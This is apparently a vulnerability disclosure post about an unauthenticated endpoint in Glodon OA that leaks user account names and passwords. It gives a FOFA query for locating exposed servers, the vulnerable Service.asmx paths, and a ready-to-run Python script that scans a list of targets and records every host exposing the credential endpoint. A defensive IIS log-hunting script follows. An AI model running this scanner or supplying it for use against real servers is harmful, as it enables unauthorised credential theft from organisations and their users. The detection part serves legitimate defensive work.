Vulnerability description
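Glodon Company Limited (广联达科技股份有限公司) is a digital building platform service provider. Its core foundation is professional applications for the construction engineering field; it offers more than one hundred products/services based on "device + cloud + big data", along with value-added services such as industry big data and new industry finance. Glodon OA has an information disclosure vulnerability: because certain interfaces have no authentication, an unauthenticated remote attacker can use those interfaces to output users' account names and passwords.
Vulnerability reproduction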
FOFA
app="Glodon-企业管理产品"
POC
IP/Org/service/Service.asmx
View all users
/Org/service/Service.asmx/GetUserXml4GEPS
View account passwords
/Org/service/Service.asmx/GetUserXml4GEPS
Python script
```python
import argparse
import time
import warnings
from urllib.parse import urlsplit

import requests
from urllib3.exceptions import InsecureRequestWarning

color_red = '\033[91m'
color_green = '\033[92m'
color_blue = '\033[94m'
color_reset = '\033[0m'


def get_url(file):
    # Read one target per line and reduce each to scheme://host[:port].
    with open(file, 'r', encoding='utf-8') as f:
        for url in f:
            url = url.replace('\n', '').strip()
            if not url:
                continue  # skip blank lines
            if 'http' not in url:
                url = 'http://' + url
            parsed_url = urlsplit(url)
            base_url = parsed_url.scheme + '://' + parsed_url.netloc
            send_req(base_url)


def write_result(content):
    # Append each finding to result.txt.
    with open('result.txt', 'a', encoding='UTF-8') as f:
        f.write('{}\n'.format(content))


# verify=False is used below, so suppress the certificate warnings.
warnings.filterwarnings('ignore', category=InsecureRequestWarning)


def send_req(url_check):
    url = url_check + '/Org/service/Service.asmx/GetAllUsersXml'
    header = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
        'Connection': 'close'
    }
    try:
        response = requests.get(url=url, headers=header, verify=False, timeout=3)
        # The user list is an XML document containing these element names.
        if (response.status_code == 200 and '?xml' in response.text
                and 'UserId' in response.text and 'SUserId' in response.text
                and 'Code' in response.text):
            response = requests.get(url=url_check + '/Org/service/Service.asmx/GetUserXml4GEPS',
                                    headers=header, verify=False, timeout=3)
            if response.status_code == 200:
                result2 = f'{url_check}/Org/service/Service.asmx/GetUserXml4GEPS'
                print(color_red + result2 + color_reset)  # Added color_reset to avoid colored text issues
                write_result(result2)
        time.sleep(1)
    except requests.RequestException:
        # Unreachable or invalid host: move on to the next one.
        pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # Help text: "file of URL addresses"
    parser.add_argument('-f', '--file', help='URL地址文件')
    args = parser.parse_args()
    if args.file:
        get_url(args.file)
    else:
        # Message: "use -f followed by the path of the URL file"
        print('使用-f加url文件地址')
```
Execution result
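On the defender's side, the two endpoints named in the POC can be hunted for in the OA server's IIS access logs. The following is an added example, not part of the original post or of any Glodon tooling; the W3C field layout and the sample log lines are constructed assumptions.

```python
from collections import defaultdict

# Endpoints named in the POC above; IIS matches paths case-insensitively.
SENSITIVE = (
    "/org/service/service.asmx/getallusersxml",
    "/org/service/service.asmx/getuserxml4geps",
)

# Constructed sample in IIS W3C extended format (assumed field layout).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-05 02:11:40 GET /Org/service/Service.asmx/GetAllUsersXml - 203.0.113.7 200
2024-01-05 02:11:41 GET /Org/service/Service.asmx/GetUserXml4GEPS - 203.0.113.7 200
2024-01-05 02:15:02 GET /org/SERVICE/service.asmx/getuserxml4geps - 198.51.100.9 401
2024-01-05 02:16:30 POST /Org/service/Service.asmx - 192.0.2.15 200
2024-01-05 02:17:12 GET /index.aspx - 192.0.2.44 200
"""


def find_exposure_hits(log_text):
    """Return {client_ip: [(timestamp, path, status), ...]} for sensitive paths."""
    fields, hits = [], defaultdict(list)
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # the column set can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated record
        row = dict(zip(fields, parts))
        path = row.get("cs-uri-stem", "").lower().rstrip("/")
        if path in SENSITIVE:
            stamp = f"{row.get('date', '?')} {row.get('time', '?')}"
            hits[row.get("c-ip", "?")].append((stamp, path, row.get("sc-status", "?")))
    return dict(hits)


def served_to(hits):
    """Client IPs that got a 200 on a sensitive path: treat as data exposure."""
    return sorted(ip for ip, rows in hits.items() if any(s == "200" for _, _, s in rows))


if __name__ == "__main__":
    found = find_exposure_hits(SAMPLE_LOG)
    for ip, rows in sorted(found.items()):
        print(ip, rows)
    print("responses served to:", served_to(found))
```

This only matches operations invoked through the URL path. A SOAP POST to `Service.asmx` itself carries the operation name in the request, which a default W3C log does not record, so such requests need separate review.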